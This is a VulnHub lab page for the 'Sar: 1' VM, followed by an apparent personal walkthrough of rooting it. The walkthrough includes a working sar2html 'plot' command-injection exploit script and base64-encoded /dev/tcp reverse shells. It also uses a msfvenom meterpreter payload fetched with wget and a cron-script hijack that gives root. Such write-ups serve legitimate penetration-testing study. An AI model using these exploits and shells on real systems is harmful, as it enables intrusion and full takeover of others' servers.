SAR: 1
About Release
Download
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
- sar.zip (Size: 2.7 GB)
- Download: https://drive.google.com/open?id=1AFAmM21AwiAEiVFUA0cSr_GeAYaxd3lQ
- Download (Mirror): https://download.vulnhub.com/sar/sar.zip
Description
Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.
File Information
- Filename: sar.zip
- File size: 2.7 GB
- MD5: B872E6DE73622EA39C762D6C3E298E73
- SHA1: 6BEE6AB15F9DE0099DB82D815F5D1D2099054B3A
Virtual Machine
- Format: Virtual Machine (Virtualbox - OVA)
- Operating System: Linux
Networking
- DHCP service: Enabled
- IP address: Automatically assign
Screenshots
1.find hosts
┌──(kwkl㉿kwkl)-[~]
└─$ sudo netdiscover -i eth2
┌──(kwkl㉿kwkl)-[~]
└─$ nmap -v -sn 172.16.70.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 11:39 HKT
Initiating Ping Scan at 11:39
Scanning 256 hosts [2 ports/host]
Completed Ping Scan at 11:39, 2.40s elapsed (256 total hosts)
Initiating Parallel DNS resolution of 4 hosts. at 11:39
Completed Parallel DNS resolution of 4 hosts. at 11:39, 6.51s elapsed
Nmap scan report for 172.16.70.0 [host down]
Nmap scan report for 172.16.70.1 (172.16.70.1)
Host is up (0.0048s latency).
Nmap scan report for 172.16.70.2 (172.16.70.2)
Host is up (0.0040s latency).
Nmap scan report for 172.16.70.3 [host down]
Nmap scan report for 172.16.70.4 [host down]
Nmap scan report for 172.16.70.5 [host down]
Nmap scan report for 172.16.70.6 [host down]
Nmap scan report for 172.16.70.7 [host down]
Nmap scan report for 172.16.70.8 [host down]
Nmap scan report for 172.16.70.9 [host down]
Nmap scan report for 172.16.70.10 [host down]
Nmap scan report for 172.16.70.11 [host down]
Nmap scan report for 172.16.70.12 [host down]
Nmap scan report for 172.16.70.13 [host down]
Nmap scan report for 172.16.70.14 [host down]
Nmap scan report for 172.16.70.15 [host down]
Nmap scan report for 172.16.70.16 [host down]
Nmap scan report for 172.16.70.17 [host down]
Nmap scan report for 172.16.70.18 [host down]
Nmap scan report for 172.16.70.19 [host down]
Nmap scan report for 172.16.70.20 [host down]
Nmap scan report for 172.16.70.21 [host down]
Nmap scan report for 172.16.70.22 [host down]
Nmap scan report for 172.16.70.23 [host down]
Nmap scan report for 172.16.70.24 [host down]
Nmap scan report for 172.16.70.25 [host down]
Nmap scan report for 172.16.70.26 [host down]
Nmap scan report for 172.16.70.27 [host down]
Nmap scan report for 172.16.70.28 [host down]
Nmap scan report for 172.16.70.29 [host down]
Nmap scan report for 172.16.70.30 [host down]
Nmap scan report for 172.16.70.31 [host down]
Nmap scan report for 172.16.70.32 [host down]
Nmap scan report for 172.16.70.33 [host down]
Nmap scan report for 172.16.70.34 [host down]
Nmap scan report for 172.16.70.35 [host down]
Nmap scan report for 172.16.70.36 [host down]
Nmap scan report for 172.16.70.37 [host down]
Nmap scan report for 172.16.70.38 [host down]
Nmap scan report for 172.16.70.39 [host down]
Nmap scan report for 172.16.70.40 [host down]
Nmap scan report for 172.16.70.41 [host down]
Nmap scan report for 172.16.70.42 [host down]
Nmap scan report for 172.16.70.43 [host down]
Nmap scan report for 172.16.70.44 [host down]
Nmap scan report for 172.16.70.45 [host down]
Nmap scan report for 172.16.70.46 [host down]
Nmap scan report for 172.16.70.47 [host down]
Nmap scan report for 172.16.70.48 [host down]
Nmap scan report for 172.16.70.49 [host down]
Nmap scan report for 172.16.70.50 [host down]
Nmap scan report for 172.16.70.51 [host down]
Nmap scan report for 172.16.70.52 [host down]
Nmap scan report for 172.16.70.53 [host down]
Nmap scan report for 172.16.70.54 [host down]
Nmap scan report for 172.16.70.55 [host down]
Nmap scan report for 172.16.70.56 [host down]
Nmap scan report for 172.16.70.57 [host down]
Nmap scan report for 172.16.70.58 [host down]
Nmap scan report for 172.16.70.59 [host down]
Nmap scan report for 172.16.70.60 [host down]
Nmap scan report for 172.16.70.61 [host down]
Nmap scan report for 172.16.70.62 [host down]
Nmap scan report for 172.16.70.63 [host down]
Nmap scan report for 172.16.70.64 [host down]
Nmap scan report for 172.16.70.65 [host down]
Nmap scan report for 172.16.70.66 [host down]
Nmap scan report for 172.16.70.67 [host down]
Nmap scan report for 172.16.70.68 [host down]
Nmap scan report for 172.16.70.69 [host down]
Nmap scan report for 172.16.70.70 [host down]
Nmap scan report for 172.16.70.71 [host down]
Nmap scan report for 172.16.70.72 [host down]
Nmap scan report for 172.16.70.73 [host down]
Nmap scan report for 172.16.70.74 [host down]
Nmap scan report for 172.16.70.75 [host down]
Nmap scan report for 172.16.70.76 [host down]
Nmap scan report for 172.16.70.77 [host down]
Nmap scan report for 172.16.70.78 [host down]
Nmap scan report for 172.16.70.79 [host down]
Nmap scan report for 172.16.70.80 [host down]
Nmap scan report for 172.16.70.81 [host down]
Nmap scan report for 172.16.70.82 [host down]
Nmap scan report for 172.16.70.83 [host down]
Nmap scan report for 172.16.70.84 [host down]
Nmap scan report for 172.16.70.85 [host down]
Nmap scan report for 172.16.70.86 [host down]
Nmap scan report for 172.16.70.87 [host down]
Nmap scan report for 172.16.70.88 [host down]
Nmap scan report for 172.16.70.89 [host down]
Nmap scan report for 172.16.70.90 [host down]
Nmap scan report for 172.16.70.91 [host down]
Nmap scan report for 172.16.70.92 [host down]
Nmap scan report for 172.16.70.93 [host down]
Nmap scan report for 172.16.70.94 [host down]
Nmap scan report for 172.16.70.95 [host down]
Nmap scan report for 172.16.70.96 [host down]
Nmap scan report for 172.16.70.97 [host down]
Nmap scan report for 172.16.70.98 [host down]
Nmap scan report for 172.16.70.99 [host down]
Nmap scan report for 172.16.70.100 [host down]
Nmap scan report for 172.16.70.101 [host down]
Nmap scan report for 172.16.70.102 [host down]
Nmap scan report for 172.16.70.103 [host down]
Nmap scan report for 172.16.70.104 [host down]
Nmap scan report for 172.16.70.105 [host down]
Nmap scan report for 172.16.70.106 [host down]
Nmap scan report for 172.16.70.107 [host down]
Nmap scan report for 172.16.70.108 [host down]
Nmap scan report for 172.16.70.109 [host down]
Nmap scan report for 172.16.70.110 [host down]
Nmap scan report for 172.16.70.111 [host down]
Nmap scan report for 172.16.70.112 [host down]
Nmap scan report for 172.16.70.113 [host down]
Nmap scan report for 172.16.70.114 [host down]
Nmap scan report for 172.16.70.115 [host down]
Nmap scan report for 172.16.70.116 [host down]
Nmap scan report for 172.16.70.117 [host down]
Nmap scan report for 172.16.70.118 [host down]
Nmap scan report for 172.16.70.119 [host down]
Nmap scan report for 172.16.70.120 [host down]
Nmap scan report for 172.16.70.121 [host down]
Nmap scan report for 172.16.70.122 [host down]
Nmap scan report for 172.16.70.123 [host down]
Nmap scan report for 172.16.70.124 [host down]
Nmap scan report for 172.16.70.125 [host down]
Nmap scan report for 172.16.70.126 [host down]
Nmap scan report for 172.16.70.127 [host down]
Nmap scan report for 172.16.70.128 [host down]
Nmap scan report for 172.16.70.129 [host down]
Nmap scan report for 172.16.70.130 [host down]
Nmap scan report for 172.16.70.131 [host down]
Nmap scan report for 172.16.70.132 (172.16.70.132)
Host is up (0.00027s latency).
Nmap scan report for 172.16.70.133 [host down]
Nmap scan report for 172.16.70.134 [host down]
Nmap scan report for 172.16.70.135 [host down]
Nmap scan report for 172.16.70.136 [host down]
Nmap scan report for 172.16.70.137 [host down]
Nmap scan report for 172.16.70.138 [host down]
Nmap scan report for 172.16.70.139 [host down]
Nmap scan report for 172.16.70.140 [host down]
Nmap scan report for 172.16.70.141 [host down]
Nmap scan report for 172.16.70.142 [host down]
Nmap scan report for 172.16.70.143 [host down]
Nmap scan report for 172.16.70.144 [host down]
Nmap scan report for 172.16.70.145 [host down]
Nmap scan report for 172.16.70.146 [host down]
Nmap scan report for 172.16.70.147 (172.16.70.147)
Host is up (0.0012s latency).
Nmap scan report for 172.16.70.148 [host down]
Nmap scan report for 172.16.70.149 [host down]
Nmap scan report for 172.16.70.150 [host down]
Nmap scan report for 172.16.70.151 [host down]
Nmap scan report for 172.16.70.152 [host down]
Nmap scan report for 172.16.70.153 [host down]
Nmap scan report for 172.16.70.154 [host down]
Nmap scan report for 172.16.70.155 [host down]
Nmap scan report for 172.16.70.156 [host down]
Nmap scan report for 172.16.70.157 [host down]
Nmap scan report for 172.16.70.158 [host down]
Nmap scan report for 172.16.70.159 [host down]
Nmap scan report for 172.16.70.160 [host down]
Nmap scan report for 172.16.70.161 [host down]
Nmap scan report for 172.16.70.162 [host down]
Nmap scan report for 172.16.70.163 [host down]
Nmap scan report for 172.16.70.164 [host down]
Nmap scan report for 172.16.70.165 [host down]
Nmap scan report for 172.16.70.166 [host down]
Nmap scan report for 172.16.70.167 [host down]
Nmap scan report for 172.16.70.168 [host down]
Nmap scan report for 172.16.70.169 [host down]
Nmap scan report for 172.16.70.170 [host down]
Nmap scan report for 172.16.70.171 [host down]
Nmap scan report for 172.16.70.172 [host down]
Nmap scan report for 172.16.70.173 [host down]
Nmap scan report for 172.16.70.174 [host down]
Nmap scan report for 172.16.70.175 [host down]
Nmap scan report for 172.16.70.176 [host down]
Nmap scan report for 172.16.70.177 [host down]
Nmap scan report for 172.16.70.178 [host down]
Nmap scan report for 172.16.70.179 [host down]
Nmap scan report for 172.16.70.180 [host down]
Nmap scan report for 172.16.70.181 [host down]
Nmap scan report for 172.16.70.182 [host down]
Nmap scan report for 172.16.70.183 [host down]
Nmap scan report for 172.16.70.184 [host down]
Nmap scan report for 172.16.70.185 [host down]
Nmap scan report for 172.16.70.186 [host down]
Nmap scan report for 172.16.70.187 [host down]
Nmap scan report for 172.16.70.188 [host down]
Nmap scan report for 172.16.70.189 [host down]
Nmap scan report for 172.16.70.190 [host down]
Nmap scan report for 172.16.70.191 [host down]
Nmap scan report for 172.16.70.192 [host down]
Nmap scan report for 172.16.70.193 [host down]
Nmap scan report for 172.16.70.194 [host down]
Nmap scan report for 172.16.70.195 [host down]
Nmap scan report for 172.16.70.196 [host down]
Nmap scan report for 172.16.70.197 [host down]
Nmap scan report for 172.16.70.198 [host down]
Nmap scan report for 172.16.70.199 [host down]
Nmap scan report for 172.16.70.200 [host down]
Nmap scan report for 172.16.70.201 [host down]
Nmap scan report for 172.16.70.202 [host down]
Nmap scan report for 172.16.70.203 [host down]
Nmap scan report for 172.16.70.204 [host down]
Nmap scan report for 172.16.70.205 [host down]
Nmap scan report for 172.16.70.206 [host down]
Nmap scan report for 172.16.70.207 [host down]
Nmap scan report for 172.16.70.208 [host down]
Nmap scan report for 172.16.70.209 [host down]
Nmap scan report for 172.16.70.210 [host down]
Nmap scan report for 172.16.70.211 [host down]
Nmap scan report for 172.16.70.212 [host down]
Nmap scan report for 172.16.70.213 [host down]
Nmap scan report for 172.16.70.214 [host down]
Nmap scan report for 172.16.70.215 [host down]
Nmap scan report for 172.16.70.216 [host down]
Nmap scan report for 172.16.70.217 [host down]
Nmap scan report for 172.16.70.218 [host down]
Nmap scan report for 172.16.70.219 [host down]
Nmap scan report for 172.16.70.220 [host down]
Nmap scan report for 172.16.70.221 [host down]
Nmap scan report for 172.16.70.222 [host down]
Nmap scan report for 172.16.70.223 [host down]
Nmap scan report for 172.16.70.224 [host down]
Nmap scan report for 172.16.70.225 [host down]
Nmap scan report for 172.16.70.226 [host down]
Nmap scan report for 172.16.70.227 [host down]
Nmap scan report for 172.16.70.228 [host down]
Nmap scan report for 172.16.70.229 [host down]
Nmap scan report for 172.16.70.230 [host down]
Nmap scan report for 172.16.70.231 [host down]
Nmap scan report for 172.16.70.232 [host down]
Nmap scan report for 172.16.70.233 [host down]
Nmap scan report for 172.16.70.234 [host down]
Nmap scan report for 172.16.70.235 [host down]
Nmap scan report for 172.16.70.236 [host down]
Nmap scan report for 172.16.70.237 [host down]
Nmap scan report for 172.16.70.238 [host down]
Nmap scan report for 172.16.70.239 [host down]
Nmap scan report for 172.16.70.240 [host down]
Nmap scan report for 172.16.70.241 [host down]
Nmap scan report for 172.16.70.242 [host down]
Nmap scan report for 172.16.70.243 [host down]
Nmap scan report for 172.16.70.244 [host down]
Nmap scan report for 172.16.70.245 [host down]
Nmap scan report for 172.16.70.246 [host down]
Nmap scan report for 172.16.70.247 [host down]
Nmap scan report for 172.16.70.248 [host down]
Nmap scan report for 172.16.70.249 [host down]
Nmap scan report for 172.16.70.250 [host down]
Nmap scan report for 172.16.70.251 [host down]
Nmap scan report for 172.16.70.252 [host down]
Nmap scan report for 172.16.70.253 [host down]
Nmap scan report for 172.16.70.254 [host down]
Nmap scan report for 172.16.70.255 [host down]
Nmap done: 256 IP addresses (4 hosts up) scanned in 8.92 seconds
2.find some info
┌──(kwkl㉿kwkl)-[~]
└─$ nmap -Pn -T4 -p- -A 172.16.70.147
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 14:41 HKT
Nmap scan report for 172.16.70.147 (172.16.70.147)
Host is up (0.00073s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds
┌──(kwkl㉿kwkl)-[~]
└─$ dirb http://172.16.70.147 255 ⨯
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jul 8 12:41:03 2023
URL_BASE: http://172.16.70.147/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.70.147/ ----
+ http://172.16.70.147/index.html (CODE:200|SIZE:10918)
+ http://172.16.70.147/phpinfo.php (CODE:200|SIZE:95497)
+ http://172.16.70.147/robots.txt (CODE:200|SIZE:9)
+ http://172.16.70.147/server-status (CODE:403|SIZE:278)
-----------------
END_TIME: Sat Jul 8 12:41:07 2023
DOWNLOADED: 4612 - FOUND: 4
some documents can be accessed!
http://172.16.70.147/
http://172.16.70.147/robots.txt
http://172.16.70.147/phpinfo.php
http://172.16.70.147/sar2HTML/index.php
useful info -》 sar2HTML
3.find exp
https://www.exploit-db.com
two infos is useful
1.
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd
url = input("Enter The url => ")
class Terminal(Cmd):
prompt = "Command => "
def default(self, args):
exploiter(args)
def exploiter(cmd):
global url
sess = requests.session()
output = sess.get(f"{url}/index.php?plot=;{cmd}")
try:
out = re.findall("<option value=(.*?)>", output.text)
except:
print ("Error!!")
for ouut in out:
if "There is no defined host..." not in ouut:
if "null selected" not in ouut:
if "selected" not in ouut:
print (ouut)
print ()
if __name__ == ("__main__"):
terminal = Terminal()
terminal.cmdloop()
2.
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.
it can be useful!
let’s use it!
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvnp 4444 1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
┌──(kwkl㉿kwkl)-[~]
└─$ echo "bash -i &>/dev/tcp/172.16.70.132/4444 <&1" | base64
YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4xNi43MC4xMzIvNDQ0NCA8JjEK
3.constructe the url!
http://172.16.70.147/sar2HTML/index.php?plot=;echo%20YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4xNi43MC4xMzIvNDQ0NCA8JjEK%20|%20base64%20-d%20|%20bash
echo YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4xNi43MC4xMzIvNDQ0NCA8JjEK | base64 -d | bash
it is
http://172.16.70.147/sar2HTML/index.php?plot=;echo YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4xNi43MC4xMzIvNDQ0NCA8JjEK | base64 -d | bash
Success!
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvnp 4444 1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.16.70.147.
Ncat: Connection from 172.16.70.147:33224.
bash: cannot set terminal process group (811): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ ls
then
www-data@sar:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
www-data@sar:/var/www/html$ cat .finally.sh
cat .finally.sh
cat: .finally.sh: No such file or directory
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh
./write.sh
www-data@sar:/var/www/html$ cat ./writes.sh
cat ./writes.sh
cat: ./writes.sh: No such file or directory
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/7777 <&1'
bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'
www-data@sar:/var/www/html$
waite 5 minutes!
┌──(kwkl㉿kwkl)-[~/HODL/htb]
└─$ nc -lvvp 7777 1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
id
id
id
Ncat: Connection from 172.16.70.147.
Ncat: Connection from 172.16.70.147:36386.
bash: cannot set terminal process group (1600): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# ls
ls
finally.sh
index.html
linpeas.sh
phpinfo.php
robots.txt
sar2HTML
write.sh
root@sar:/var/www/html# cd /root
cd /root
root@sar:~# ls
ls
root.txt
snap
root@sar:~# cat root.txt
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
root@sar:~#
root@sar:~#
root@sar:~# passwd love 123456
passwd love 123456
Usage: passwd [options] [LOGIN]
Options:
-a, --all report password status on all accounts
-d, --delete delete the password for the named account
-e, --expire force expire the password for the named account
-h, --help display this help message and exit
-k, --keep-tokens change password only if expired
-i, --inactive INACTIVE set password inactive after expiration
to INACTIVE
-l, --lock lock the password of the named account
-n, --mindays MIN_DAYS set minimum number of days before password
change to MIN_DAYS
-q, --quiet quiet mode
-r, --repository REPOSITORY change password in REPOSITORY repository
-R, --root CHROOT_DIR directory to chroot into
-S, --status report password status on the named account
-u, --unlock unlock the password of the named account
-w, --warndays WARN_DAYS set expiration warning days to WARN_DAYS
-x, --maxdays MAX_DAYS set maximum number of days before password
change to MAX_DAYS
root@sar:~# passwd love
passwd love
Enter new UNIX password: 123456
Retype new UNIX password: 123456
passwd: password updated successfully
root@sar:~#
root@sar:~#
root@sar:~# passwd root
OR we can use python scripts~
1.
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ cat sar.py
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd
url = input("Enter The url => ")
class Terminal(Cmd):
prompt = "Command => "
def default(self, args):
exploiter(args)
def exploiter(cmd):
global url
sess = requests.session()
output = sess.get(f"{url}/index.php?plot=;{cmd}")
try:
out = re.findall("<option value=(.*?)>", output.text)
except:
print ("Error!!")
for ouut in out:
if "There is no defined host..." not in ouut:
if "null selected" not in ouut:
if "selected" not in ouut:
print (ouut)
print ()
if __name__ == ("__main__"):
terminal = Terminal()
terminal.cmdloop()
2.
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ python3 sar.py
Enter The url => http://172.16.70.147/sar2HTML
Command => ls
LICENSE
index.php
linpeas.sh
sar2html
sarDATA
sarFILE
3.
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.132 LPORT=4444 -o shell2.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell2.php
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ ls
keyring sar.py sar.sh shell2.php
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ ls
keyring sar.py sar.sh shell2.php
┌──(kwkl㉿kwkl)-[~/HODL/vulnhub]
└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
172.16.70.147 - - [08/Jul/2023 22:59:52] "GET /shell2.php HTTP/1.1" 200 -
172.16.70.147 - - [08/Jul/2023 23:04:15] "GET /shell2.php HTTP/1.1" 200 -
172.16.70.147 - - [08/Jul/2023 23:04:33] "GET /shell2.php HTTP/1.1" 200 -
4.
msf6 payload(php/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.70.132 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.70.132:4444
5.
Command => wget http://172.16.70.132:5555/shell2.php ../shell2.php
Command => ls ../
finally.sh
index.html
linpeas.sh
phpinfo.php
robots.txt
sar2HTML
write.sh
Command => wget http://172.16.70.132:5555/shell2.php -O ../shell2.php
Command => ls ../
finally.sh
index.html
linpeas.sh
phpinfo.php
robots.txt
sar2HTML
shell2.php
write.sh
Command => chmod +x ../shell2.php
Command =>
6. browser the url
http://172.16.70.147/shell2.php
7.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.70.132:4444
[*] Sending stage (39927 bytes) to 172.16.70.147
[*] Meterpreter session 8 opened (172.16.70.132:4444 -> 172.16.70.147:45154) at 2023-07-08 23:06:25 +0800
meterpreter > shell
Process 1601 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
cat /var/www/html/finally.sh
#!/bin/sh
./write.sh
8.
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 7777
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
9.
echo "bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'" >> write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/7777 <&1'
bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'
bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'
10.
Ncat: Connection from 172.16.70.147.
Ncat: Connection from 172.16.70.147:42102.
bash: cannot set terminal process group (1667): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html#
root@sar:/var/www/html#
root@sar:/var/www/html#
root@sar:/var/www/html# cat /root/root.xt
cat /root/root.xt
cat: /root/root.xt: No such file or directory
root@sar:/var/www/html# cat /root/root.txt
cat /root/root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
root@sar:/var/www/html#
or
Command => pwd
/var/www/html/sar2HTML
Command => echo "bash -c 'exec bash -i &>/dev/tcp/172.16.70.132/7777 <&1'" >> ../write.sh
Command => cat ../write.sh
#!/bin/sh
touch /tmp/gateway
bash -c 'exec bash -i &
bash -c 'exec bash -i &
bash -c 'exec bash -i &
Command => cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
Command =>
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 7777 130 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
id
id
id
id
id
id
Ncat: Connection from 172.16.70.147.
Ncat: Connection from 172.16.70.147:42118.
bash: cannot set terminal process group (1835): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html#
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html#
######if we use this solution ,look simply ,but it can run too!
other:upload linpeas.sh can get many infos
Change the user love’s password so we can login for fun!
496
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
